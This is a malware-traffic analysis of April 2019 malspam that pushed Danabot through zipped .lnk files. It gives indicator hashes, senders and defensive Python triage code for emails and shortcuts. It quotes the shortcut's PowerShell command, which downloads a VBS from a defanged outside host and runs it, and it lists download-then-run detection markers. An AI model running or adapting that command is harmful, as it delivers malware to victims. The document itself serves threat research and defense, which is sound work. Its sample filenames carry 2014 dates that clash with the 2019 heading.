2019-04-19 - malspam pushing Danabot

malware_traffic, Apr 19th, 2019
2019-04-19 - MALSPAM WITH ATTACHED ARCHIVES CONTAINING .LNK FILES PUSHING DANABOT

CHAIN OF EVENTS:

Email --> Attached zip archive --> Extracted .lnk file --> 1.5 MB VBS retrieved from business4good[.]eu/hren.php --> 481 kB Danabot EXE created by VBS file

$ grep Subject *.eml
2014-04-19-malspam-0228-UTC.eml:Subject: Inner City CRR Network Meeting
2014-04-19-malspam-0232a-UTC.eml:Subject: Inner City CRR Network Meeting
2014-04-19-malspam-0232b-UTC.eml:Subject: Inner City CRR Network Meeting
2014-04-19-malspam-0238-UTC.eml:Subject: Inner City CRR Network Meeting
2014-04-19-malspam-0241-UTC.eml:Subject: Inner City CRR Network Meeting
2014-04-19-malspam-0251-UTC.eml:Subject: Inner City CRR Network Meeting
2014-04-19-malspam-0256-UTC.eml:Subject: Inner City CRR Network Meeting
2014-04-19-malspam-0503-UTC.eml:Subject: Inner City CRR Network Meeting

$ grep From: *.eml
2014-04-19-malspam-0228-UTC.eml:From: Betty Wellman <7e754@3bc73.com>
2014-04-19-malspam-0232a-UTC.eml:From: "Ravizee, Monica" <8f863d34@c5447.edu>
2014-04-19-malspam-0232b-UTC.eml:From: "Duffy, Kasey" <4ef33a@ea98e70.edu>
2014-04-19-malspam-0238-UTC.eml:From: <62a@4c90fe.com>
2014-04-19-malspam-0241-UTC.eml:From: Sahnly Phan-Chan Pha0194 <d3325d5@13c5aa11886a3a316e42d.au>
2014-04-19-malspam-0251-UTC.eml:From: =?utf-8?B?2YfZitmB2KfYoSDZhdit2YXYryDYs9i52K8g2KfZhNi02KjZitio?=
2014-04-19-malspam-0256-UTC.eml:From: =?utf-8?B?2LPYp9ix2Kkg2LnYqNiv2KfZhNmF2K3Ys9mGINmF2K3ZhdivINi52KjYr9in?=
2014-04-19-malspam-0503-UTC.eml:From: =?utf-8?B?2YfZitmB2KfYoSDZhdit2YXYryDYs9i52K8g2KfZhNi02KjZitio?=

$ grep filename= *.eml
2014-04-19-malspam-0228-UTC.eml:Content-Disposition: attachment; filename="nMeeert19583.zip"; size=28635;
2014-04-19-malspam-0232a-UTC.eml:Content-Disposition: attachment; filename="nMeeert78598.zip"; size=27866;
2014-04-19-malspam-0232b-UTC.eml:Content-Disposition: attachment; filename="nMeeert55514.zip"; size=30056;
2014-04-19-malspam-0238-UTC.eml:Content-Disposition: attachment; filename="nMeeert91228.zip"; size=21880;
2014-04-19-malspam-0241-UTC.eml:Content-Disposition: attachment; filename="nMeeert47131.zip"; size=26269;
2014-04-19-malspam-0251-UTC.eml:Content-Disposition: attachment; filename="nMeeert74116.zip"; size=27517;
2014-04-19-malspam-0256-UTC.eml:Content-Disposition: attachment; filename="nMeeert9433.zip"; size=25205;
2014-04-19-malspam-0503-UTC.eml:Content-Disposition: attachment; filename="nMeeert30458.zip"; size=28133;

$ shasum -a 256 *.eml
085d0045e93c59ba8fcbac06f09caa3cf63c5b37353f6722600c6faa167940dc  2014-04-19-malspam-0228-UTC.eml
1cd2b8a8e7519e7902601230df061fffc8c1a033e0a3d6dadbc20b258b46c017  2014-04-19-malspam-0232a-UTC.eml
5914536c8da0feedb01ce78114b99d8d23b074a28c291588673587eca62d64a1  2014-04-19-malspam-0232b-UTC.eml
0f5f3b6023557c3480ed28cbcadbaf426969ef83f297d30bcd796ea03b22bc23  2014-04-19-malspam-0238-UTC.eml
9604d0cc7b98b56cd7b811e2cde91172ad7187d88a3df075b616e00bfe743f8c  2014-04-19-malspam-0241-UTC.eml
f314783a04bf0bf69d69baf55d79248f731580fe1ccf5c4773edea48141dcdf4  2014-04-19-malspam-0251-UTC.eml
722b896aee101545a83b45f751d9c111d81be1f9d45a0d9520c18ead40a2c38b  2014-04-19-malspam-0256-UTC.eml
15019b15348aeabffc81af614378900e87e455bd5538e6c4e4d7430b59e5f4db  2014-04-19-malspam-0503-UTC.eml

$ shasum -a 256 *.zip
1b214e8fb5ee2561d7dc32ae6075b9d984e55968fcec453d7c0d69591adde724  nMeeert19583.zip
e0abcda09bdf517bfebfc26a8f12bbf3202e709ef8a4a23383e9900bc6077c67  nMeeert30458.zip
e55458aac38ef9bd06e5e82c90c369f4ed89e0fa599f703271ec3f6ab9638011  nMeeert47131.zip
eeba8af15905e1f00ae45720998ff6fd4e4d2124672b78fdd72de67dcaae4c93  nMeeert55514.zip
3cd388ddd9a45a0eb5e2defb5941251d8b44ba9fe88ef30306fe00629af7ac17  nMeeert74116.zip
6b962a63f26cfbe6fba89f58522ee99e63e1e655f477cb58d6411ad991e813f2  nMeeert78598.zip
e29af015c6df4b291d90591100cd6c63c21f8ed7218d596ea8ab4af7dad919dc  nMeeert91228.zip
ed1beff140614fc40d72d665baf1ff1b1bd9e75705e4f8583a22a0116b2dbf76  nMeeert9433.zip

$ shasum -a 256 *.lnk
b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d  nMeeert19583.lnk
b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d  nMeeert30458.lnk
b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d  nMeeert47131.lnk
b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d  nMeeert55514.lnk
b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d  nMeeert74116.lnk
b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d  nMeeert78598.lnk
b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d  nMeeert91228.lnk
b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d  nMeeert9433.lnk
  66.  
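The grep and shasum passes above can be done in one pass. The following Python is an added example (not part of the original paste): it parses .eml files with the standard library, hashes each attachment, opens any zip attachment in memory and hashes its members, then groups archives by member hash, which is how the single LNK hash shared by all eight zips stands out. The two messages are constructed in-code from sender addresses and attachment names listed above; the shortcut bytes inside them are a dummy header, and `triage_eml`, `group_by_member_hash`, `build_sample_eml` and `run` are names chosen for this example.

```python
import email
import hashlib
import io
import zipfile
from email import policy
from email.message import EmailMessage

# First 20 bytes of every ShellLink file: HeaderSize 0x4C followed by the ShellLink CLSID.
LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")


def sha256(data):
    return hashlib.sha256(data).hexdigest()


def triage_eml(raw):
    """Pull Subject, From, each attachment's hash and, for zips, the members' hashes."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    record = {"subject": str(msg["Subject"]), "from": str(msg["From"]), "attachments": []}
    for part in msg.iter_attachments():
        blob = part.get_payload(decode=True)
        att = {"filename": part.get_filename(), "size": len(blob),
               "sha256": sha256(blob), "members": []}
        if blob[:2] == b"PK":  # zip local-file-header signature
            with zipfile.ZipFile(io.BytesIO(blob)) as zf:
                for info in zf.infolist():
                    member = zf.read(info)
                    att["members"].append({
                        "name": info.filename, "size": len(member),
                        "sha256": sha256(member),
                        "is_lnk": member.startswith(LNK_MAGIC),
                    })
        record["attachments"].append(att)
    return record


def group_by_member_hash(records):
    """Map each extracted member's SHA-256 to the zip filenames that carried it."""
    groups = {}
    for rec in records:
        for att in rec["attachments"]:
            for m in att["members"]:
                groups.setdefault(m["sha256"], []).append(att["filename"])
    return groups


def build_sample_eml(sender, subject, zip_name, member_name, member_bytes):
    """Constructed message with one zip attachment (fixture for this example, not a real sample)."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = "recipient@example.test"
    msg["Subject"] = subject
    msg.set_content("Please see the attached agenda.")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(member_name, member_bytes)
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip", filename=zip_name)
    return msg.as_bytes()


# Dummy shortcut: real ShellLink magic, zeroed remainder of the 76-byte header (constructed).
FAKE_LNK = LNK_MAGIC + b"\x00" * 56

# Senders and attachment names taken from the grep output above; message bodies are constructed.
SAMPLE_EMAILS = [
    build_sample_eml("Betty Wellman <7e754@3bc73.com>", "Inner City CRR Network Meeting",
                     "nMeeert19583.zip", "nMeeert19583.lnk", FAKE_LNK),
    build_sample_eml('"Ravizee, Monica" <8f863d34@c5447.edu>', "Inner City CRR Network Meeting",
                     "nMeeert78598.zip", "nMeeert78598.lnk", FAKE_LNK),
]


def run(raws=SAMPLE_EMAILS):
    records = [triage_eml(r) for r in raws]
    return records, group_by_member_hash(records)


if __name__ == "__main__":
    records, groups = run()
    for rec in records:
        for att in rec["attachments"]:
            print(f'{rec["subject"]} | {rec["from"]} | {att["filename"]} '
                  f'({att["size"]} bytes) {att["sha256"]}')
            for m in att["members"]:
                print(f'    -> {m["name"]} lnk={m["is_lnk"]} {m["sha256"]}')
    for digest, zips in groups.items():
        print(f"{digest} shared by {len(zips)} archive(s): {', '.join(zips)}")
```

Point `run()` at real .eml bytes read from disk to reproduce the listing above; the zip hashes differ per message because each archive carries a differently named member, while the member hashes collapse to one entry, exactly the pattern in the `*.lnk` output.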
SHORTCUT FROM .LNK FILE:

C:\Windows\System32\cmd.exe /c @echo off&powershell -command Invoke-WebRequest "hxxp://business4good[.]eu/hren.php" -OutFile "%tmp%\tmp856845.vbs"; start-process %tmp%\tmp856845
  70.  
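The command line above is the shortcut's target plus its arguments, which live in the StringData section of the MS-SHLLINK format. The following Python is an added example (not part of the original paste): it reads the ShellLinkHeader, skips the optional LinkTargetIDList and LinkInfo blocks by their declared sizes, decodes the StringData fields without ever launching the shortcut, and then flags the download-then-run pattern seen here (PowerShell, Invoke-WebRequest, -OutFile into %tmp%, start-process). The .lnk bytes are constructed in-code from the command line above with the URL left defanged; `build_lnk`, `parse_lnk`, `triage_lnk` and the marker list are names and choices made for this example.

```python
import struct

# ShellLinkHeader constants from MS-SHLLINK.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
# StringData fields appear in this fixed order, each only when its flag is set.
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# Target and arguments copied from the shortcut shown above (URL kept defanged).
SAMPLE_TARGET = r"C:\Windows\System32\cmd.exe"
SAMPLE_ARGS = (
    r'/c @echo off&powershell -command Invoke-WebRequest "hxxp://business4good[.]eu/hren.php" '
    r'-OutFile "%tmp%\tmp856845.vbs"; start-process %tmp%\tmp856845'
)


def build_lnk(relative_path, arguments, id_list=b""):
    """Assemble a minimal Unicode .lnk (constructed fixture, not the real sample)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    if id_list:
        flags |= HAS_LINK_TARGET_ID_LIST
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    header += struct.pack("<I", 0x80)           # FileAttributes: FILE_ATTRIBUTE_NORMAL
    header += b"\x00" * 24                      # Creation/Access/Write FILETIMEs (unset)
    header += struct.pack("<IIIH", 0, 0, 1, 0)  # FileSize, IconIndex, ShowCommand=SW_SHOWNORMAL, HotKey
    header += b"\x00" * 10                      # Reserved1/2/3
    body = b""
    if id_list:
        # IDListSize counts the ItemIDs plus the 2-byte TerminalID.
        body += struct.pack("<H", len(id_list) + 2) + id_list + b"\x00\x00"
    for text in (relative_path, arguments):      # CountCharacters + UTF-16LE, no terminator
        body += struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + body


def parse_lnk(data):
    """Return the StringData fields of a .lnk, skipping the IDList/LinkInfo blocks."""
    if (len(data) < LNK_HEADER_SIZE
            or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a ShellLink file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]  # LinkInfoSize includes itself
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        if len(raw) != nbytes:
            raise ValueError("truncated StringData for %s" % name)
        pos += nbytes
        fields[name] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252", "replace")
    return fields


# Substrings that together describe the download-then-run chain in the shortcut above.
DOWNLOAD_EXEC_MARKERS = ("powershell", "invoke-webrequest", "-outfile", "start-process", "%tmp%")


def triage_lnk(data):
    """Reconstruct the command a shortcut would run and score it against the markers."""
    fields = parse_lnk(data)
    command = " ".join(v for v in (fields.get("relative_path"), fields.get("arguments")) if v)
    lowered = command.lower()
    hits = [m for m in DOWNLOAD_EXEC_MARKERS if m in lowered]
    return {"command": command, "indicators": hits, "suspicious": len(hits) >= 3}


if __name__ == "__main__":
    # One dummy ItemID (size 10, eight bytes of data) exercises the IDList skip.
    sample = build_lnk(SAMPLE_TARGET, SAMPLE_ARGS, id_list=b"\x0a\x00" + b"\x1f" * 8)
    print(triage_lnk(sample))
```

Real shortcuts usually carry a LinkTargetIDList and LinkInfo block and sometimes an EnvironmentVariableDataBlock in ExtraData; the size-based skipping handles the first two, and the StringData is what the shell actually passes to CreateProcess, so it is the field worth extracting and alerting on.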
ASSOCIATED MALWARE:

SHA256 hash: f2d51add5d58d4712d9e024f1e9bdb0f6d4955a749b6a09972344dfd778b8ca4
File size: 1,544,171 bytes
File location: hxxp://business4good[.]eu/hren.php
File location: C:\Users\[username]\AppData\Local\Temp\tmp856845.vbs
File description: Initial VBS file downloaded after double-clicking extracted LNK file.
Any.Run analysis: https://app.any.run/tasks/353a979f-df1c-4512-9c71-f1e77ad14ae5

SHA256 hash: 9f98291702605aed9e61085a4e9d4e83cfe0942757542487fd36da92cdbd48e9
File size: 480,768 bytes
File location: C:\Users\[username]\AppData\Local\Temp\tOIRccbdGFRn.dllMvVviGEN
File description: Danabot EXE created by the above VBS file
Any.Run analysis: https://app.any.run/tasks/a6ebc434-3cdc-4aa2-8665-6a984fbfc727